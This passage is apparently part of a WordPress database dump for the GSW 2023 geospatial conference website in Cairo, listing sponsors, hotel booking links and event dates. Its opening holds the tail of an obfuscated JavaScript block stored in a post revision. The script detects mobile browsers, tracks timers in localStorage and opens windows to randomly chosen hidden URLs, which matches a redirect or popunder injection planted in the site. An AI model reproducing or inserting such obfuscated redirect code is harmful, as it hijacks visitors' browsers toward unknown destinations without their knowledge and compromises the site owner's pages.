g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-07-29 03:14:47','2023-07-29 03:14:47','',3066,'https://gsw2023.com/?p=5062',0,'revision','',0),
(5063,1,'2023-07-29 03:22:03','2023-07-29 03:22:03','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081933017{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081968974{margin-top: 95px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081337215{margin-top: 40px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689080719428{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081395417{margin-top: 10px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951146401{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600821341{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><img class=\"alignnone wp-image-5061 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\n<p><img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\n<p><img class=\"alignnone size-medium wp-image-4793 aligncenter\" 